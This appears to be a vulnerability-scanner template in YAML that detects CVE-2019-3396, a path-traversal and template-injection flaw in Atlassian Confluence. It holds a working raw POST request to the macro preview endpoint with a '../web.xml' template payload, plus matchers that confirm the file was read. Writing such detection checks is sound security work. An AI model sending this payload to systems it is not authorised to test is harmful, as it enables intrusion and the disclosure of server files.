32 lines
1.4 KiB
YAML
32 lines
1.4 KiB
YAML
id: CVE-2019-3396
|
|
info:
|
|
author: harshbothra_
|
|
name: Atlassian Confluence Path Traversal
|
|
severity: high
|
|
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
|
|
reference: https://github.com/x-f1v3/CVE-2019-3396
|
|
tags: cve,cve2019,atlassian,confluence,lfi,rce
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
|
Referer: {{Hostname}}
|
|
Content-Length: 168
|
|
Connection: close
|
|
|
|
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "<param-name>contextConfigLocation</param-name>"
|